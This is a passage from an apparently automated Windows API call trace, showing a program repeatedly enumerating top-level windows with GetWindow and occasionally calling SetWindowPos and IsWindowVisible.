[0057.582] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.582] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.582] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.582] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.582] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.582] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.582] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.582] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.582] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.582] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.582] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.582] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.582] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.582] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.582] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.582] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.582] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.582] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.582] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.582] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.582] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.582] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.582] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.582] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.582] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.582] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.583] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.583] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.583] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.583] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.583] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.583] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.583] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.583] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.583] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.583] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.583] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.583] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.583] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.583] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.583] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.583] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.583] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.583] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.583] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.583] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.583] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.583] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.583] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.583] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.583] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.583] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.583] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.583] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.584] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.584] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.584] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.584] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.584] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.584] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.584] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.584] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.584] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.584] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.584] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.584] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.584] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.584] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.584] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.584] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.584] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.584] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.584] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.584] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.584] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.584] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.584] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.584] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.584] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.584] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.584] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.584] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.584] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.584] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.584] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.584] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.585] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.585] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.585] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.585] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.585] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.585] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.585] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.585] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.585] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.585] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.585] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.585] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.585] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.585] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.585] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.586] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.586] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.586] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.586] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.586] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.586] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.586] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.586] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.586] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.586] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.586] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.586] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.586] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.586] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.586] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.586] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.586] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.586] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.586] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.586] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.586] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.586] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.586] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.586] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.586] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.586] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.587] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.587] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.587] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.587] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.587] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.587] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.587] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.587] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.587] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.587] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.587] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.587] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.587] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.587] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.587] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.587] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.587] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.587] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.587] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.587] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.587] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.587] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.587] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.587] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.588] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.588] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.588] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.588] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.588] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.588] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.588] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.588] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.588] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.588] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.588] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.588] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.588] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.588] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.588] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.588] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.588] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.588] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.588] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.588] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.588] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.588] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.588] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.589] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.589] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.589] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.589] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.589] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.589] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.589] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.589] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.589] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.589] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.589] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.589] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.589] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.589] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.589] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.589] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.589] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.589] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.589] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.589] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.589] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.589] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.589] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.589] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.589] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.589] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.589] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.589] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.590] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.590] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.590] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.590] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.590] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.590] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.590] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.590] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.590] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.590] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.590] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.590] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.590] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.590] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.590] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.590] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.590] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.590] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.590] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.590] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.590] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.590] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.590] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.590] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.590] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.590] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.590] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.590] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.590] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.590] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.590] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.591] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.591] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.591] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.591] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.591] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.591] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.591] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.591] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.591] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.591] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.591] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.591] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.591] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.591] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.591] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.591] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.591] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.591] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.591] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.591] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.591] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.591] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.591] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.597] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.597] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.597] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.597] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.597] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.597] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.597] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.597] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.597] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.597] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.597] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.597] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.597] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.597] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.597] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.597] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.597] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.597] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.597] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.597] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.598] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.598] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.598] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.598] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.598] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.598] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.598] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.598] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.598] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.598] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.598] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.598] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.598] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.598] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.598] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.598] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.598] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.598] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.598] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.598] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.598] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.598] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.598] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.598] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.598] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.598] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.598] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.598] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.598] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.598] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.598] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.599] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.599] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.599] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.599] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.599] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.599] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.599] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.599] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.599] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.599] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.599] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.599] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.599] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.599] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.599] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.599] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.599] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.599] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.599] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.599] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.599] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.599] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.599] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.599] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.599] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.600] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.600] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.600] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.600] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.600] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.600] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.600] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.600] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.600] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.600] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.600] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.600] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.600] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.600] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.600] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.600] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.600] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.600] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.600] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.600] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.600] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.600] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.600] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.600] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.601] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.601] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.601] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.601] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.601] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.601] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.601] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.601] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.601] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.601] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.601] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.601] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.601] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.601] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.601] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.601] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.601] GetWindow (hWnd=0x1015e, uCmd=0x2) 